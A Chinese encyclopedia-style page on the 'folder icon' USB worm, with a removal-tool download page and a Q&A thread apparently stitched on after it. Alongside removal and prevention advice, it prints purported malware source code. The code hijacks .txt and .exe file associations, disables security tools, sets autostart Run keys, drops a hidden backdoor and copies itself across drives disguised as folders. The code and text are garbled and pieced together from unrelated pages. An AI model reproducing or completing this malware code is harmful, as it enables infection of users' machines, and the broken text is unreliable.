文件夹图标病毒_百度百科
清除历史记录关闭
声明：百科词条人人可编辑，词条创建和修改均免费，绝不存在官方及代理商付费代编，请勿上当受骗。
文件夹图标病毒
文件夹图标病毒不是一个病毒，而是具有类似性质的病毒的统称，此类病毒会将真正的文件夹隐藏起来，并生成一个与文件夹同名的EXE文件，并使用文件夹的图标，使用户无法分辨，从而频繁感染，一些用户的文件夹被隐藏影响正常的工作与学习。
文件夹图标病毒病毒由来
文件夹图标病毒具有Autorun属性。该病毒是用编写，运行后会在系统目录下生成类似XP-8B618895.EXE的病毒副本，其中8B618895是随机的，并搜索移动设备，生成autorun文件，并根据移动存储设备根目录文件夹名生成同名EXE文件，并将原文件夹隐藏起来。另外病毒还会删除及Cookies，删除IE访问记录TypedURL。
生成文件(以为C盘，winxp Sp3为例，U:\代表U盘盘符)
C:\WINDOWS\system32\XP-8B618895.EXE 1,501,856
C:\WINDOWS\system32\ul.dll 2,404
C:\WINDOWS\system32\og.dll 692
C:\WINDOWS\system32\com.run 270,336
C:\Documents and Settings\Nick\\程序\启动\　.lnk 指向C:\WINDOWS\system32\XP-8B618895.EXE（注意空格）
U:\Recycled.exe
在U盘根目录生成文件夹图标同名EXE文件
以下是的库文件等：
C:\WINDOWS\system32\dp1.fne
C:\WINDOWS\system32\eAPI.fne
C:\WINDOWS\system32\internet.fne
C:\WINDOWS\system32\krnln.fnr
C:\WINDOWS\system32\RegEx.fnr
C:\WINDOWS\system32\shell.fne
C:\WINDOWS\system32\spec.fne
添加注册表启动项：
\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
XP-8B618895（这里也是随机的，根据病毒名生成的不同而变）
文件夹图标病毒病毒源代码
bool CVirousApp::OpenFuckFile()
char CmdLine[MAX_PATH]={0};
char DirUrl[MAX_PATH]={0};
char HiJack[MAX_PATH]={0};
if(!(MAX_PATH,DirUrl))
return FALSE;
char ch='\\';
if(ch!=*(DirUrl strlen(DirUrl)-1))
strcat(DirUrl,&\\&);
//此处只在系统根目录下有效
sprintf(HiJack,&%s%s\\&,DirUrl,AfxGetApp()-&m_pszAp pName);
//判断是否存在。
if(-1==_access(HiJack,0))
return FALSE;
sprintf(CmdLine,& %s&,HiJack);
// MessageBox(CmdLine); //For a Test
if(WinExec(CmdLine,SW_SHOW)&31)
return FALSE;
return TRUE;
2、劫持&txt、exe&文件，并屏蔽常用安全工具
//定义特征字符串
BOOL check=TRUE;
int len=7;
char *FuckExe[]={&USBCleaner&,
&IceSword&,
&WSYSCHECK&,
//获取参数并判断
if(strcmp(m_lpCmdLine,&&))//如果有参数
//判断特征字符串
for(i=0;i&i )
if(strstr(_(_strdup(m_lpCmdLine)),
_(_strdup(FuckExe))))
{ check=FALSE;}
// ext=wcschr(m_lpCmdLine,_T(&.&)) 1;
// if(!(ext,_T(&txt&)))
if(strstr(m_lpCmdLine,_T(&.txt&))||strstr(m_lpCmdL ine,_T(&.TXT&)))
cmd.Format(&%s %s&,&&,m_lpCmdLine);
if(strstr(m_lpCmdLine,_T(&.exe&))||strstr(m_lpCmdL ine,_T(&.EXE&)))
//此处不完美。
判断文件名
if(!check)
// AfxMessageBox(&文件已损坏！&);
::MessageBox(NULL,&文件已损坏！请重新安装！&,&Microsoft&,MB_OK);
return FALSE;
cmd.Format(&%s&,m_lpCmdLine);
WinExec(cmd,SW_NORMAL);
//打开文件
OpenFuckFile();
3、自启动及实现劫持&exe、txt&文件
//向系统目录下拷贝程序
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hM
hModule=GetModuleHandle(NULL);
GetModuleFileName(hModule,FileSource,MAX_PATH);
CloseHandle(hModule);
GetSystemDirectory(FileNew,MAX_PATH);
strcat(FileNew,&\\SysKernel.exe&);
CopyFile(FileSource,FileNew,TRUE);
(FileNew, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//写注册表。
弄个自启动
WriteRegEx(HKEY_LOCAL_MACHINE,&SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run&,
&SysKernel&,,FileNew,0,0);
//写注册表，进行
char Hijack[MAX_PATH]={0};
sprintf(Hijack,&%s %%1&,FileNew);
WriteRegEx(HKEY_LOCAL_MACHINE,&SOFTWARE\\Classes\\ txtfile\\shell\\open\\command&,
NULL,REG_SZ,Hijack,0,1);
WriteRegEx(HKEY_LOCAL_MACHINE,&SOFTWARE\\Classes\\ exefile\\shell\\open\\command&,
NULL,REG_SZ,Hijack,0,1);
4、释放，并启动之
BOOL CVirousDlg::ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
HGLOBAL hR
HRSRC hResI
hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);
if (hResInfo == NULL)
return FALSE;
hRes = LoadResource(NULL, hResInfo);
if (hRes == NULL)
return FALSE;
hFile = CreateFile
lpFileName,
GENERIC_WRITE,
FILE_SHARE_WRITE,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
if (hFile == NULL)
return FALSE;
WriteFile(hFile, hRes, (NULL, hResInfo), &dwBytes, NULL);
CloseHandle(hFile);
return TRUE;
VOID CVirousDlg::ReleaseDoor()
char strSystemPath[MAX_PATH];
GetSystemDirectory(strSystemPath, sizeof(strSystemPath));
lstrcat(strSystemPath, &\\SysService.exe&);
ReleaseResource(IDR_BIN, &BIN&, strSystemPath);
(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//实现自启动
WriteRegEx(HKEY_LOCAL_MACHINE,&SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run&,
&SysService&,REG_SZ,strSystemPath,0,0);
WinExec(strSystemPath,SW_HIDE);
5、遍历磁盘并拷贝自身
//遍历系统磁盘
BOOL CVirousDlg::FuckFile()
DWORD dwNumBytesForDriveS//实际驱动器号的字符串长度
CString strL
//获得实际存储驱动器号的字符串长度
dwNumBytesForDriveStrings=(0 ,NULL);//*sizeof(TCHAR);
//如果字符串不为空。
则表示有正常的驱动器存在
if (dwNumBytesForDriveStrings!=0)
lp=new char[dwNumBytesForDriveStrings];
(dwNumBytesForDriveStrings,l p);
while (*lp!=0)
DoBad(lp);
lp=strchr(lp,0) 1;
return TRUE;
return FALSE;
VOID CVirousDlg::DoBad(char DriveBuf[])
// build a string with wildcards
CString strWildcard(DriveBuf);
strWildcard = _T(&*.*&);
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hM
hModule=GetModuleHandle(NULL);
GetModuleFileName(hModule,FileSource,MAX_PATH);
// CloseHandle(hModule);
// start working for files
BOOL bWorking = finder.FindFile(strWildcard);
while (bWorking)
bWorking = finder.FindNextFile();
// skip . and .. otherwise, we'd
// recur infinitely!
if (finder.IsDots())
// if it's a directory, recursively search it
if (finder.IsDirectory()&&!finder.IsSystem()&&!finder .IsHidden())
if(!(finder.GetFilePath(),
FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))
sprintf(FileNew,&%s%s&,finder.GetFilePath(),&.exe& );
CopyFile(FileSource,FileNew,TRUE);
if(FUCKREG==nReg)
WriteReg(FileNew);
finder.Close();
文件夹图标病毒查杀方式
1.下载usbcleaner，并运行其中的foldercure.exe
2.下载usbcleaner单独的文件夹图标病毒，下
3.手动查杀：
XP-8B618895.EXE（注意名称不固定，最好用icesword，其图标是文件夹容易区分）
C:\WINDOWS\system32\ul.dll 2,404
C:\WINDOWS\system32\og.dll 692
C:\WINDOWS\system32\com.run 270,336
C:\Documents and Settings\Nick\「开始」菜单\程序\启动\　.lnk 指向C:\WINDOWS\system32\XP-8B618895.EXE（注意空格）
C:\WINDOWS\system32\og.EDT&一个VB程序那种图标的exe（名字记不清了，总之看修改日期就好几乎与其他是同一时期而且这几个文件都在一块呢）
(以上两个原文里虽然没提但还是也一并删除吧，再啰嗦一句，当然XP-*.exe这些看见也一概删除)
（删除下面几个是关键哦，网上一般解决办法都没提）
以下是易语言的库文件等：
C:\WINDOWS\system32\dp1.fne
C:\WINDOWS\system32\eAPI.fne
C:\WINDOWS\system32\internet.fne
C:\WINDOWS\system32\krnln.fnr
C:\WINDOWS\system32\RegEx.fnr
C:\WINDOWS\system32\shell.fne
C:\WINDOWS\system32\spec.fne
删除病毒启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
XP-8B618895（此处根据病毒名称而定）
手动删除U盘根目录的文件夹图标同名EXE文件
-------------------------------
文件夹图标病毒病毒危害
模仿文件夹的病毒目前发现至少五种，其行为恶劣程度不等，轻微恶劣的更像是恶作剧程序，最恶劣的一个是连系统盘各目录内都模仿全了，总之如果U盘有了文件夹图标的exe千万不要点（右键也不要！）。删除的时候务必选择强制删除才好。还有除了删除上述所说的文件外，请务必也将temp文件夹下的库文件用IceSword强制删除，我的建议是搜索C盘所有后缀名为fne&fnr的文件然后删之（杀任何病毒都应有此习惯）。否则虽然system32下的虽删除了，但如果重启动作慢的话依然有可能复发哦！
文件夹图标病毒病毒防范
该病毒的主要传播方式为U盘传播，像打印店，大学计算机机房，公司电脑等这些频繁使用U盘的地方极易感染此病毒。所以我们需要通过一些（比如360卫士）关闭我们电脑的U盘自动播放功能，防止AUTORUN的病发。
文件夹图标病毒手工防毒法
更改电脑的相关设置:
1.控制面板,,查看
隐藏文件和文件夹
显示所有隐藏文件和文件夹
2.更改文件夹的查看方式
打开任意文件夹,点查看,选详细信息.
3.(可选),查看
隐藏已知文件类型的扩展名,不打钩.
经过以上设置,在打开文件夹的时候,看&类型&,那些文件夹病毒将再无藏身之地.首先,文件类型变成了,或者(后缀名exe),文件大小...如果是真正的文件夹,是不存在&文件大小&的.那里显示的是空白,但假的文件夹就是有大小的.
如果显示了扩展名,那些文件就彻底暴露了,它将显示为.exe,摆明就是病毒嘛
如果养成了对U盘保持警惕的习惯,这些判断都只在瞬间完成.没有习惯的人,,总会学聪明的.
还有一招是.用批处理来打开U盘,并且自动删除根目录下的.这招比较傻瓜化,但你的U盘将不能在根目录下直接存放EXE文件(你可以建立文件夹存放它们).
start explorer h:\
del h:\*.exe
这里假设U盘的盘符是h:
这个方法可以防范U盘感染文件夹病毒,也可以用于判断机器是否已经感染该类型病毒.
清除历史记录关闭文件夹图标
点击：1233
点击：26488
北京千橡网景科技发展有限公司：
文网文[号··京公网安备号·甲测资字·文化部监督电子邮箱：wlwh@vip.sina.com·
文明办网文明上网举报电话： 举报邮箱：admin1@renren-inc.com&&&&&&&&&&&&&&&&修复被木马或病毒隐藏的文件夹_百度文库
赠送免券下载特权
10W篇文档免费专享
部分付费文档8折起
每天抽奖多种福利
两大类热门资源免费畅读
续费一年阅读会员，立省24元！
修复被木马或病毒隐藏的文件夹
你可能喜欢foldercure（文件夹图标病毒专杀工具） V2.4 绿色版下载_完美软件下载foldercureV2.4绿色版文件夹图标病毒专杀工具软件大小：710.41 KB更新时间：软件语言：简体中文软件授权：免费软件版本类型：绿色版版本号：2.4适用系统：WinXP/WIN7/Win8/Win108分相关软件03-0101-1111-2211-1011-02软件介绍本类推荐精品合集相关文章下载地址相关评论FolderCure是一款功能强大，绿色小巧的文件夹图标专杀工具，工具USBCLeaner的一个增强组件，专门用于生成同名文件夹EXE文件，并原文件夹的病毒。并具有修复显示隐藏文件及系统文件，修复磁盘双击打开，处理磁盘根目录Autorun自运行文件的功能，查杀更多U盘病毒和了解本程序请访问。功能说明u盘工具usbcleaner是一种纯绿色的辅助杀毒工具,具有检测查杀70余种U盘病毒,U盘病毒广谱,U盘病毒免疫,修复显示隐藏文件及系统文件,安全移动盘盘符等功能,全方位一 体化修复杀除U盘病毒.同时u盘病毒专杀工具usbcleanerr能迅速对新出现的U盘病毒进行处理.u盘病毒专杀工具usbcleaner是你学习,工作,的好帮手。更新内容1. 修正USBCleaner对正常vmnat.exe的错误警报问题。2. 对FolderCure部分界面进行美化调整。3. 更新FolderCure到V4.4。4. 对USBCleaner更新模块Update.exe进行改进，以后在USBCleaner没有更新的时候，可通过在线升级获取FolderCure的全部更新文件。5. 对FolderCure更新模块进行调整与优化。6. 修正USBMON在繁体中文系统中重复运行提示文字的乱码问题。7. 修正USBCleaner主程式一处在繁体中文系统中乱码问题。8. 对FolderCure报告Folder_ForceHidden作非病毒标注。9. 对FolderCure病毒库重新进行优化（注意这将使旧版本的FolderCure无法正确读取新版病毒库，请下载最新版）。10. 增强对文件夹图标病毒Important.FILES.EXE系列的识别与查杀。11. 增强对gdiplus.exe usddriver.exe等回收站图标病毒的查杀（可通过FolderCure查杀）。12. 新增240个新U盘类病毒的查杀，其中包括delautorun.bat Worm.Win32.Autorun.204800；.exe Trojan.Win32.DownldrU.a；useinit.exe Worm.Win32.Autorun.jot；h4ck3v1l.vbs Worm.Script.VBS.Autorun；cao.exe Trojan.Win32.Nodef.ihw；boot.exe Trojan.Win32.Undef.dqr等等。精品合集木马病毒是我们都非常熟悉而且对电脑危害比较大的一款电脑病毒，木马与一般的病毒不同，它不会自我繁殖，也并不&刻意&rdqu ...13.32 MB 40.61 MB 39.85 MB 15.22 MB 文件夹图标病毒专杀工具是针对文件夹类病毒而制作的，它不仅可以清理掉全部的病毒本体和副本，以及病毒的注册表项，彻底杀死病毒 ...5.19 MB 194.7 KB 8.96 KB 634.47 KB 下载地址foldercureV2.4绿色版高速下载地址：其他下载地址：本类推荐30.17 MB40.36 MB30.07 MB24.81 MB28.04 MB99.82 MB296 KB49.54 MB14.75 MB6.18 MB29.51 MB17.16 MB猜你感兴趣下载周排行下载月排行装机必备WMZhe.com 版权所有 京ICP备号U盘里在文件夹里自动生成一个和文件夹同名的空白子文件夹_百度知道
U盘里在文件夹里自动生成一个和文件夹同名的空白子文件夹
插上U盘以后，总是会在文件夹的根目录自动生成一个同名文件夹 打不开 还占用U盘空间
手动删除以后 下次插上又会自动生成 怎么处理啊？
我有更好的答案
方法1、这是EXE病毒引起的，可以找出隐藏文件，将其删除。（1）点击工具栏中的“工具”，在弹出的列表中选择“文件夹选项”，在新出现的窗口中点击“查看”，拖动滚动条，找到“隐藏文件和文件夹”，选择下面那一个“显示隐藏的文件，文件夹和驱动器”确定。（2）当隐藏文件显示出来以后，在图标上右键，删除。方法2、U盘中毒了，建议用杀毒软件，对电脑系统和U盘进行杀毒。下面以金山毒霸为例，说一说对U盘查杀和对U盘文件恢复的方法。(1）打开“”程序，点击“百宝箱”“新毒霸”“U盘卫士”项，用新毒霸的软件对u盘进行扫描、查杀。(2）再打开的“金山U盘卫士”界面中，点击“全盘查杀”按钮。
采纳率：87%
呵呵，这是病毒，你把隐藏文件那个勾挑上，你会发现这个文件夹的后缀是.exe，这是一个文件夹隐藏病毒，你真的文件夹都被隐藏，你不能双击这个假的文件夹，否则你的电脑就中毒了这个毒挺好杀得，弄一个文件夹隐藏病毒专杀工具或者是USBcleaner就好了以后记得把U盘的自动播放功能关掉
原来文件夹里的内容都在 就是新增了一个同名的子文件而已
恩，这就是病毒，是不是后缀是.exe?
是的 用USBceaner能清除U盘上的 那电脑上的怎么清除啊？ 杀毒软件都扫描不到
还是用USBcleaner，执行全盘扫描！问一下，你用的是什么杀毒软件，这个病毒很基本的啊对了，如果你只是杀掉了优盘里的毒，电脑里的没有杀掉的话，你插入优盘还是会中毒的，一定要都杀掉
本回答被提问者采纳
看看是不是中病毒了！我就遇见过这种病毒
中毒！要杀毒！这个病毒把你盘中的文件全部隐藏，然后建立.EXE后缀但文件象文件夹的可执行文件!你首先要给你电脑杀毒！然后再杀优盘！
其他2条回答
为您推荐：
其他类似问题
您可能关注的内容
子文件夹的相关知识
换一换
回答问题，赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。}